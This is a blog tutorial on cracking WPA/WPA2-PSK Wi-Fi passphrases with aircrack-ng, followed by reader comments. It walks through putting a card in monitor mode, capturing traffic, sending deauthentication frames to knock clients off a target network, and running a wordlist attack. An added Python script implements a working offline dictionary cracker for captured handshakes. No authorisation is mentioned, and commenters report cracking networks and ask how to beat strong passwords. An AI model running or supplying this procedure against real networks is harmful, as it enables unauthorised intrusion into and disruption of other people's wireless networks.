How To Crack A WPA Key With Aircrack-ng
With the growing popularity of wireless networks and mobile computing, an understanding of common wireless security issues has become necessary for home users and IT professionals alike. This article illustrates how a WPA/WPA2-PSK network protected by a weak passphrase can be broken. Note that this is not an attack on the WPA2 protocol itself but on poorly chosen pre-shared keys; the same procedure fails against a long random passphrase. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To crack WPA/WPA2-PSK you first need a wireless card that can be put into "monitor" mode, so that it passively captures frames without being associated with any network. One of the best free tool suites for monitoring wireless traffic and cracking WPA-PSK/WPA2-PSK keys is aircrack-ng, which we use throughout this article. It has both Linux and Windows versions (provided your network card and driver are supported under Windows; in practice, monitor mode and frame injection work far more reliably on Linux).
The network adapter I am going to use for WPA/WPA2 cracking is the Alfa AWUS036H, on BackTrack 5 R2.
Step 1 : Setting up your network device
To capture wireless traffic without being associated with an access point, we need to put the wireless card into monitor mode. To do that, type:
Command # iwconfig (lists all wireless interfaces and their current mode and status)
Command # airmon-ng start wlan0 (puts the card into monitor mode; substitute your own interface name for wlan0. On BackTrack 5 this creates a separate monitor interface named mon0, which the following steps use. Newer aircrack-ng releases name it wlan0mon instead and recommend running airmon-ng check kill first to stop network managers that would interfere with the capture.)
Step 2 : Reconnaissance
This step assumes your wireless interface is already in monitor mode; check with iwconfig, which should show Mode:Monitor for the monitor interface. The next step is finding the wireless networks in range and choosing your target:
Command # airodump-ng mon0 (hops across all 2.4 GHz channels, listing the access points in range with their BSSID, channel and encryption type, and the clients associated with each.)
Step 3 : Capturing Packets
To capture data into a file, we use the airodump-ng tool again, with additional switches that lock it onto the target AP's channel and BSSID instead of hopping. Assuming our monitor interface is mon0, the target is on channel 1, and we want to write the capture to files prefixed data:
Command # airodump-ng -c 1 --bssid AP_MAC -w data mon0 (AP_MAC is the target's BSSID from step 2. Note that -w data writes a packet capture named data-01.cap, not a text file; this is the file aircrack-ng reads in step 5. Leave this running for the next step.)
Step 4 : De-Authentication Technique
To crack a WPA-PSK network you need a capture file containing the four-way handshake, which is only exchanged when a client connects or reconnects. Rather than waiting for a client to join, you can deauthenticate an already-associated client: it reconnects automatically and the handshake is captured. While airodump-ng from step 3 is still running, open a second terminal and run:
Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (sends 3 deauthentication frames; MAC_AP is the BSSID of the access point and MAC_Client is the MAC address of an associated client from the station list airodump-ng shows. Omitting -c broadcasts the deauthentication to all clients of the AP.)
airodump-ng reports success by printing "WPA handshake: AP_MAC" in the top right of its display. Once that appears, we have acquired the WPA handshake and can stop capturing.
Step 5 : Cracking WPA/WPA2
Once you have captured the four-way handshake, you also need a large, relevant dictionary file (commonly known as a wordlist) of candidate passphrases.
Command # aircrack-ng -w wordlist -b AP_MAC data-01.cap (where wordlist is your dictionary file and data-01.cap is the capture file from step 3 containing a valid WPA handshake; -b selects the target BSSID in case the capture contains handshakes from several networks)
The handshake is the only thing the attack needs from the network; everything after that happens offline and can be repeated against the same capture with different wordlists. That offline phase is the slow part: WPA derives the pairwise master key from the passphrase and SSID with 4096 rounds of PBKDF2-HMAC-SHA1, so every candidate costs thousands of hash operations and a single CPU core tests only on the order of a few thousand candidates per second. The attack succeeds only if the actual passphrase is in the wordlist.
Running through tens of millions of candidates therefore usually takes many hours, in the hope of stumbling on a combination of common numerals or dictionary words. Still, a weak, short, common or otherwise human-readable passphrase is often broken within minutes by this offline dictionary attack, while a long random passphrase is out of reach of it entirely.
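To show what aircrack-ng actually computes in step 5, and why the handshake from step 4 is all it needs, here is an added Python example. It is not part of the original article and not aircrack-ng's own code; it reimplements the IEEE 802.11i key derivation (PBKDF2 for the PMK, PRF-512 for the PTK, and the EAPOL-Key MIC), checks the PMK against the standard's published test vector for passphrase "password" and SSID "IEEE", and then runs a dictionary attack against a constructed handshake message 2. The MAC addresses, nonces, RSN information element and wordlist are made up for the example; the MIC offset and key-info parsing follow the EAPOL-Key frame layout.

```python
import hashlib
import hmac
import struct

# IEEE 802.11-2007 Annex H test vector: passphrase "password", SSID "IEEE"
IEEE_TEST_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The 4096 iterations are what make every dictionary guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that authenticates EAPOL-Key MICs."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + IV (16) + RSC (8) + ID (8) = 81 bytes before the 16-byte MIC field
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    Key Descriptor Version 1 (TKIP) uses HMAC-MD5; version 2 (CCMP) uses HMAC-SHA1 truncated to 128 bits."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Offline dictionary attack: for each candidate derive PMK -> KCK and compare the frame's MIC.
    Returns the passphrase that verifies, or None if no candidate matches."""
    target_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        if not 8 <= len(word) <= 63:  # not a valid WPA passphrase; aircrack-ng skips these as well
            continue
        kck = wpa_kck(wpa_pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), target_mic):
            return word
    return None


# --- Constructed sample (NOT a real capture): message 2 of the four-way handshake, as a
# legitimate supplicant would build it with the correct passphrase ---

def build_msg2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> bytes:
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-CCMP, PSK
    key_info = 0x010A  # key descriptor version 2 (CCMP), Pairwise, MIC present
    body = (b"\x02" + struct.pack(">HH", key_info, 0) + struct.pack(">Q", 1)  # RSN descriptor, replay ctr 1
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8            # nonce, IV, RSC, ID
            + b"\x00" * 16                                                   # MIC placeholder
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    eapol = b"\x01\x03" + struct.pack(">H", len(body)) + body               # EAPOL v1, type Key
    kck = wpa_kck(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, eapol)
    return eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]


SSID = "IEEE"                                   # assumed values for the example
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MSG2 = build_msg2("password", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
WORDLIST = ["short", "12345678", "letmein1", "qwertyuiop", "password", "Password1"]

if __name__ == "__main__":
    print("PMK matches IEEE test vector:", wpa_pmk("password", "IEEE").hex() == IEEE_TEST_VECTOR_PMK)
    print("cracked passphrase:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, MSG2, WORDLIST))
```

Against a real capture the inputs come from the .cap file: the BSSID and station MAC from the frame headers, the ANonce from message 1 or 3, and the SNonce and MIC from message 2. Everything the loop does per candidate is the PBKDF2 call plus a handful of HMACs, which is why wordlist quality matters far more than CPU speed, and why the same handshake can be retried offline with a better wordlist at any time.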
About The Author
Shaharyar Shafiq is pursuing a Bachelor's in Computer Engineering at Hamdard University. He holds the C|PTE (Certified Penetration Testing Engineer) certification and is interested in network penetration testing and forensics.
Hi Shaharyar,
Nice post, but this is a WPA cracking tutorial via BackTrack. Can you post one more tutorial on WPA cracking via Windows? aircrack-ng is also available for Windows, but I don't know how to use it.
Amazing stuff, really helped me out. I was always wondering how to crack it and got it cracked in less than 20 mins. Good job bro, keep on posting good stuff, waiting for your new invention.
Regards,
G.A
Salam Rafay, I am from Karachi. I have a question: which institute is best for learning ethical hacking in Karachi?
@Ratnesh
Thank you for your appreciation. I'll try to write another tutorial on WPA via Windows soon :)
@G.A
Thanks :)
And where do I get a large/relevant dictionary file (commonly known as a wordlist) with common passphrases for free?
Salam Shaharyar Shafiq,
You have done well with WPA/WPA2.
And your profile is really appreciated.
I have done all of WEP/WPA/WPA2 with a dictionary attack. I have been looking for something that doesn't need a dictionary attack but brute force.
I used rainbow tables as well, but now I am very happy.
Question is:
Can you check with John the Ripper (there is an option there, incremental)? What does it do, does it redirect keywords to the current cracking process? I have checked and tried, but it takes too long.
If you can find any other way of cracking in a very short time.
Normally people choose their password like (TdrW%I5Gh$); this is not in the dictionary. How to crack this quickly?
Allah hafiz
Dear, when I use the iwlan0 command I can't see my Wi-Fi???
How can I set the wireless network card in monitor mode??
Thanks :)
Which operating system do you guys use? If it is Linux based, then which flavor do you prefer?
Please, someone help: after the handshake, how do I put the dictionary with aircrack? I do all the commands but still nothing. I don't know how to install the dictionary on the desktop. Please help me.
Please, anyone help about aircrack-ng: the handshake is complete but I don't know how to install the dictionary on the desktop. How does it run? Please help me. Shahid